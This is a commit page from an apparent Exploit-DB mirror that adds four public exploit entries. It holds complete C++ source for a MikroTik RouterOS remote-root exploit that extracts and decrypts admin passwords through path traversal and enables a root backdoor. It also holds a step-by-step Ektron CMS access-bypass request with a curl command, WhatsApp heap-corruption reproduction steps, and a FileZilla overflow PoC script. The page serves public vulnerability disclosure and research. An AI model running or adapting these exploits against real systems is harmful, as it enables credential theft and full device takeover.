bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-11

Browse source 
4 changes to exploits/shellcodes

FileZilla 3.33 - Buffer Overflow (PoC)

WhatsApp - RTP Processing Heap Corruption

MicroTik RouterOS < 6.43rc3 - Remote Root

Ektron CMS 9.20 SP2 - Improper Access Restrictions
This commit is contained in:
Offensive Security 2018-10-11 05:01:43 +00:00
parent 6fe17058fb
commit 038ac7b860
5 changed files with 591 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

51
exploits/android/dos/45579.txt Normal file
View file

@ -0,0 +1,51 @@
Heap corruption can occur when the WhatsApp mobile application receives a malformed RTP packet.
08-31 15:43:50.721 9428 9713 F libc : Fatal signal 11 (SIGSEGV), code 1, fault addr 0x7104200000 in tid 9713 (Thread-11)
08-31 15:43:50.722 382 382 W : debuggerd: handling request: pid=9428 uid=10119 gid=10119 tid=9713
08-31 15:43:50.818 9720 9720 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
08-31 15:43:50.818 9720 9720 F DEBUG : Build fingerprint: 'google/angler/angler:7.1.2/N2G48H/natash11071827:userdebug/dev-keys'
08-31 15:43:50.818 9720 9720 F DEBUG : Revision: '0'
08-31 15:43:50.818 9720 9720 F DEBUG : ABI: 'arm64'
08-31 15:43:50.818 9720 9720 F DEBUG : pid: 9428, tid: 9713, name: Thread-11 >>> com.whatsapp <<<
08-31 15:43:50.818 9720 9720 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7104200000
08-31 15:43:50.819 9720 9720 F DEBUG : x0 00000071041ffde8 x1 00000071047796b0 x2 0000000000000000 x3 0000000000000030
08-31 15:43:50.819 9720 9720 F DEBUG : x4 0000000000000000 x5 0000000000000040 x6 00000071041fffd8 x7 8181818181818181
08-31 15:43:50.819 9720 9720 F DEBUG : x8 8181818181818181 x9 8181818181818181 x10 8181818181818181 x11 8181818181818181
08-31 15:43:50.819 9720 9720 F DEBUG : x12 8181818181818181 x13 8181818181818181 x14 8181818181818181 x15 0000000000000000
08-31 15:43:50.819 9720 9720 F DEBUG : x16 0000007110a468a0 x17 000000712f3b0908 x18 0000000000000000 x19 0000000000000280
08-31 15:43:50.819 9720 9720 F DEBUG : x20 00000071088744a8 x21 0000000000000280 x22 00000071256a5a28 x23 0000007104ff9b70
08-31 15:43:50.819 9720 9720 F DEBUG : x24 000000000000100d x25 000000000000120d x26 0000007104779480 x27 0000007108830828
08-31 15:43:50.819 9720 9720 F DEBUG : x28 0000000000151f80 x29 00000071043fe540 x30 000000711060a010
08-31 15:43:50.819 9720 9720 F DEBUG : sp 00000071043fe320 pc 000000712f3b0a5c pstate 0000000060000000
08-31 15:43:50.825 9720 9720 F DEBUG :
08-31 15:43:50.825 9720 9720 F DEBUG : backtrace:
08-31 15:43:50.825 9720 9720 F DEBUG : #00 pc 000000000001aa5c /system/lib64/libc.so (memcpy+340)
08-31 15:43:50.825 9720 9720 F DEBUG : #01 pc 00000000000c500c /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #02 pc 00000000000c7d60 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #03 pc 00000000000f88d4 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #04 pc 00000000000f6948 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #05 pc 00000000000f0ef4 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #06 pc 00000000000f0630 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #07 pc 00000000000eef3c /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #08 pc 00000000001272e0 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #09 pc 0000000000303d20 /data/app/com.whatsapp-2/lib/arm64/libwhatsapp.so
08-31 15:43:50.825 9720 9720 F DEBUG : #10 pc 0000000000068734 /system/lib64/libc.so (_ZL15__pthread_startPv+208)
08-31 15:43:50.825 9720 9720 F DEBUG : #11 pc 000000000001da7c /system/lib64/libc.so (__start_thread+16)
This issue can occur when a WhatsApp user accepts a call from a malicious peer. It affects both the Android and iPhone clients.
To reproduce the issue:
1) Apply the attached patch to libwhatsapp.so in the Android application using bsdiff. this patch intercepts a memcpy right before srtp_protect is called, and alters the RTP buffer. The SHA1 of the original library I used was cfdb0266cbd6877e5d146ddd59fa83ebccdd013d, and the SHA1 of the modified library is 042256f240367eaa4a096527d1afbeb56ab2eeb4.
2) Build the attached file, natalie2.c for the Android device the application is running on, and copy it to /data/data/com.whatsapp/libn.so.
3) Copy the files in the attached folder into /data/data/com.whatsapp/files so that /data/data/com.whatsapp/files/t0 is a valid location.
4) Restart WhatsApp and call the target device and pick up the call. The deivce will crash in a few seconds.
Logs from the crashes on Android and iPhone are attached. Note that I modified the Android target binary to disable WhatsApp's custom crash handling. The iPhone WhatsApp install was unmodified.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45579.zip

112
exploits/aspx/webapps/45577.txt Normal file
View file

@ -0,0 +1,112 @@
Details
================
Software: Ektron Content Management System (CMS)
Version: 9.20 SP2
Homepage: https://www.episerver.com
Advisory report: https://github.com/alt3kx/CVE-2018-12596
CVE: CVE-2018-12596
CVSS: 7.5 (HIGH: (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE-284
Description
================
Ektron CMS 9.20 SP2 allows remote attackers to enable users.
Vulnerability
================
Ektron CMS 9.20 SP2 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page
is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).
Proof of concept Exploit
========================
Pre-requisites:
- curl command deployed (Windows or Linux)
- Burpsuite Free/Pro deployed or any other WebProxy to catch/send GET request
Step (1): Launch the BurpSuite with default paramenter then request the follwing URL:
Target: https://ektronserver.com/WorkArea/activateuser.aspx
Normally you will see a 403 Forbidden: Access denied.
Step (2): Into BurpSuite Free/Pro add the following extra Header Referer:
"Referer: ALEX;"
Step (3): The offending GET request is:
GET /WorkArea/activateuser.aspx HTTP/1.1
Host: ektronserver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Referer: ALEX;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Step (4): Test your GET request using curl command and burpsuite as following:
# curl -i -s -k -XGET "https://ektronserver.com/WorkArea/activateuser.aspx"
-H "Host: ektronserver.com"
-H "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
-H "Referer: ALEX;"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate"
-H "Connection: close"
--proxy http://127.0.0.1:8080
You should see now the following response 200 OK!:
HTTP/1.0 200 Connection established
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Now you got access to enable users, just send the repeat request into the browser using burpsuite
Have fun!
Mitigations
================
Install the latest patches available here:
PATCH ID: EKTR-508: Security enhancement for re-enabling a user
https://support.episerver.com/hc/en-us/articles/115002828112-9-2-SP2-Site-Update
Any of the below should fix CVE-2018-12596
9.3(main release)
9.2 SP2 Site CU 22
9.1 SP3 Site CU 45
9.0 SP3 Site CU 31
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
20180608: Discovered
20180611: Retest staging environment
20180612: Restes live environment
20180619: Internal communication
20180621: Vendor notification
20180621: Vendor feedback
20180629: Vendor feedback product will be patched
20180629: Patch available
20180629: Agrements with the vendor to publish the CVE/Advisory.
20180730: Internal communication
20180915: Patches tested on LAB environment.
20181008: Public report
Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db: https://www.exploit-db.com/author/?a=1074

385
exploits/hardware/remote/45578.cpp Normal file
View file

@ -0,0 +1,385 @@
/*
# Exploit Title: RouterOS Remote Rooting
# Date: 10/07/2018
# Exploit Author: Jacob Baines
# Vendor Homepage: www.mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3
# Tested on: RouterOS Various
# CVE : CVE-2018-14847
By the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:
Longterm: 6.30.1 - 6.40.7
Stable: 6.29 - 6.42
Beta: 6.29rc1 - 6.43rc3
The exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway
The exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an "option" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user "devel" with the admin's password.
Mikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:
https://blog.mikrotik.com/security/winbox-vulnerability.html
Note that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.
# Usage Example
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
*/
#include <sstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
#include "winbox_session.hpp"
#include "winbox_message.hpp"
#include "md5.hpp"
namespace
{
const char s_version[] = "By the Way 1.0.0";
/*!
* Parses the command line arguments. The program will always use two
* parameters (ip and winbox port) but the port will default to 8291 if
* not present on the CLI
*
* \param[in] p_arg_count the number of arguments on the command line
* \param[in] p_arg_array the arguments passed on the command line
* \param[in,out] p_ip the ip address to connect to
* \param[in,out] p_winbox_port the winbox port to connect to
* \return true if we have valid ip and ports. false otherwise.
*/
bool parseCommandLine(int p_arg_count, const char* p_arg_array[],
std::string& p_ip, std::string& p_winbox_port)
{
boost::program_options::options_description description("options");
description.add_options()
("help,h", "A list of command line options")
("version,v", "Display version information")
("winbox-port,w", boost::program_options::value<std::string>()->default_value("8291"), "The winbox port")
("ip,i", boost::program_options::value<std::string>(), "The ip to connect to");
boost::program_options::variables_map argv_map;
try
{
boost::program_options::store(
boost::program_options::parse_command_line(
p_arg_count, p_arg_array, description), argv_map);
}
catch (const std::exception& e)
{
std::cerr << e.what() << "\n" << std::endl;
std::cerr << description << std::endl;
return false;
}
boost::program_options::notify(argv_map);
if (argv_map.empty() || argv_map.count("help"))
{
std::cerr << description << std::endl;
return false;
}
if (argv_map.count("version"))
{
std::cerr << "Version: " << ::s_version << std::endl;
return false;
}
if (argv_map.count("ip") && argv_map.count("winbox-port"))
{
p_ip.assign(argv_map["ip"].as<std::string>());
p_winbox_port.assign(argv_map["winbox-port"].as<std::string>());
return true;
}
else
{
std::cerr << description << std::endl;
}
return false;
}
/*!
* This function uses the file disclosure vulnerability, CVE-2018-14847, to
* download the user database from /flash/rw/store/user.dat
*
* \param[in] p_ip the address of the router to connect to
* \param[in] p_winbox_port the winbox port to connect to
* \return a string containing the user.dat data or an empty string on error
*/
std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)
{
std::cout << "[+] Extracting passwords from " << p_ip << ":" << p_winbox_port << std::endl;
Winbox_Session winboxSession(p_ip, p_winbox_port);
if (!winboxSession.connect())
{
std::cerr << "[!] Failed to connect to the remote host" << std::endl;
return std::string();
}
WinboxMessage msg;
msg.set_to(2, 2);
msg.set_command(7);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_string(1, "//./.././.././../flash/rw/store/user.dat");
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "[!] Error receiving an open file response." << std::endl;
return std::string();
}
boost::uint32_t sessionID = msg.get_session_id();
boost::uint16_t file_size = msg.get_u32(2);
if (file_size == 0)
{
std::cerr << "[!] File size is 0" << std::endl;
return std::string();
}
msg.reset();
msg.set_to(2, 2);
msg.set_command(4);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.set_session_id(sessionID);
msg.add_u32(2, file_size);
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "[!] Error receiving a file content response." << std::endl;
return std::string();
}
return msg.get_raw(0x03);
}
/*!
* Looks through the user.dat file for an enabled administrative account that
* we can use. Once a useful account is found the password is decrypted.
*
* \param[in] p_user_dat the user.dat file data
* \param[in,out] p_username stores the found admin username
* \param[in,out] p_password stores the found admin password
* \return true on success and false otherwrise
*/
bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)
{
std::cout << "[+] Searching for administrator credentials " << std::endl;
// the dat file is a series of nv::messages preceded by a two byte length
std::string dat(p_user_dat);
while (dat.size() > 4)
{
boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);
if (dat[2] != 'M' || dat[3] != '2')
{
// this is mild insanity but the .dat file messages don't line
// up properly if a new user is added or whatever.
dat.erase(0, 1);
continue;
}
dat.erase(0, 4);
length -= 4;
if (length > dat.size())
{
return false;
}
std::string entry(dat.data(), length);
dat.erase(0, length);
WinboxMessage msg;
msg.parse_binary(entry);
// we need an active admin account
// 0x2 has three groups: 1 (read), 2 (write), 3 (full)
if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)
{
p_username.assign(msg.get_string(1));
std::string encrypted_pass(msg.get_string(0x11));
if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)
{
std::string hash_this(p_username);
hash_this.append("283i4jfkai3389");
MD5 md5;
md5.update(hash_this.c_str(), hash_this.size());
md5.finalize();
std::string md5_hash(md5.getDigest());
for (std::size_t i = 0; i < encrypted_pass.size(); i++)
{
boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];
if (decrypted == 0)
{
// a null terminator! We did it.
return true;
}
p_password.push_back(decrypted);
}
p_password.clear();
}
}
}
return false;
}
}
/*!
* This function creates the file /pckg/option on the target. This will enable
* the developer login on Telnet and SSH. Oddly, you'll first need to log in
* to Telnet for SSH to work, but I digress...
*
* \param[in] p_ip the ip address of the router
* \param[in] p_port the port of the jsproxy we'll connect to
* \param[in] p_username the username we'll authenticate with
* \param[in] p_password the password we'll authenticate with
* \return true if we successfully created the file.
*/
bool create_file(const std::string& p_ip, const std::string& p_port,
const std::string& p_username, const std::string& p_password)
{
Winbox_Session mproxy_session(p_ip, p_port);
if (!mproxy_session.connect())
{
std::cerr << "[-] Failed to connect to the remote host" << std::endl;
return false;
}
boost::uint32_t p_session_id = 0;
if (!mproxy_session.login(p_username, p_password, p_session_id))
{
std::cerr << "[-] Login failed." << std::endl;
return false;
}
std::cout << "[+] Creating /pckg/option on " << p_ip << ":" << p_port << std::endl;
WinboxMessage msg;
msg.set_to(2, 2);
msg.set_command(1);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.set_session_id(p_session_id);
msg.add_string(1, "//./.././.././../pckg/option");
mproxy_session.send(msg);
msg.reset();
mproxy_session.receive(msg);
if (msg.has_error())
{
std::cout << "[-] " << msg.get_error_string() << std::endl;
return false;
}
std::cout << "[+] Creating /flash/nova/etc/devel-login on " << p_ip << ":" << p_port << std::endl;
msg.reset();
msg.set_to(2, 2);
msg.set_command(1);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.set_session_id(p_session_id);
msg.add_string(1, "//./.././.././../flash/nova/etc/devel-login");
mproxy_session.send(msg);
msg.reset();
mproxy_session.receive(msg);
if (msg.has_error())
{
std::cout << "[-] " << msg.get_error_string() << std::endl;
return false;
}
return true;
}
int main(int p_argc, const char** p_argv)
{
std::string ip;
std::string winbox_port;
if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))
{
return EXIT_FAILURE;
}
std::cout << std::endl;
std::cout << " ╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬" << std::endl;
std::cout << " ╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘" << std::endl;
std::cout << " ╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴ " << std::endl;
std::cout << std::endl;
// step one - do the file disclosure
std::string user_dat(getPasswords(ip, winbox_port));
if (user_dat.empty())
{
return EXIT_FAILURE;
}
// step two - parse the password
std::string admin_username;
std::string admin_password;
if (!get_password(user_dat, admin_username, admin_password))
{
std::cout << "[-] Failed to find admin creds. Trying default." << std::endl;
admin_username.assign("admin");
admin_password.assign("");
}
std::cout << "[+] Using credentials - " << admin_username << ":" << admin_password << std::endl;
// step three - create the file
if (!create_file(ip, winbox_port, admin_username, admin_password))
{
return EXIT_FAILURE;
}
std::cout << "[+] There's a light on" << std::endl;
return EXIT_SUCCESS;
}

39
exploits/linux/dos/45576.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: FileZilla 3.33 Buffer-Overflow (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-10
# Software Link: https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/filezilla/3.33.0-1/filezilla_3.33.0-1.debian.tar.xz
# Vendor Homepage : https://filezilla-project.org
# Tested Version: 3.33
# Tested on OS: Kali Linux 2018.3 x64
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt". Copy the content from "exploit.txt".
# Open new terminal and write "filezilla"
# Go to Bookmarks and Add bookmark or Ctrl + B
# Now paste the contents of "exploit.txt" into the fields. "Name:"
# Click "OK" after Click "Bookmarks" you will see a crash on terminal.
#!/usr/bin/python
buffer = "\x50\x48\x52" * 1300
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

4
files_exploits.csv
View file

@ -6142,8 +6142,10 @@ id,file,description,date,author,type,platform,port
45547,exploits/linux/dos/45547.txt,"net-snmp 5.7.3 - Authenticated Denial of Service (PoC)",2018-10-08,"Magnus Klaaborg Stubman",dos,linux,
45557,exploits/linux/dos/45557.c,"Linux - Kernel Pointer Leak via BPF",2018-10-08,"Google Security Research",dos,linux,
45558,exploits/android/dos/45558.txt,"Android - sdcardfs Changes current->fs Without Proper Locking",2018-10-08,"Google Security Research",dos,android,
45576,exploits/linux/dos/45576.py,"FileZilla 3.33 - Buffer Overflow (PoC)",2018-10-10,"Kağan Çapar",dos,linux,
45571,exploits/windows/dos/45571.js,"Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass",2018-10-09,"Google Security Research",dos,windows,
45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows,
45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16532,6 +16534,7 @@ id,file,description,date,author,type,platform,port
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,
43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,
45578,exploits/hardware/remote/45578.cpp,"MicroTik RouterOS < 6.43rc3 - Remote Root",2018-10-10,"Jacob Baines",remote,hardware,
43993,exploits/windows/remote/43993.py,"Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution",2018-02-07,"Faisal Tameesh",remote,windows,
43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787
43999,exploits/multiple/remote/43999.txt,"Uniview - Remote Command Execution / Export Config (PoC)",2017-10-28,bashis,remote,multiple,
@ -39951,6 +39954,7 @@ id,file,description,date,author,type,platform,port
45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php,
45577,exploits/aspx/webapps/45577.txt,"Ektron CMS 9.20 SP2 - Improper Access Restrictions",2018-10-10,alt3kx,webapps,aspx,
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
45266,exploits/windows/webapps/45266.txt,"Sentrifugo HRMS 3.2 - 'deptid' SQL Injection",2018-08-27,"Javier Olmedo",webapps,windows,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,

Can't render this file because it is too large.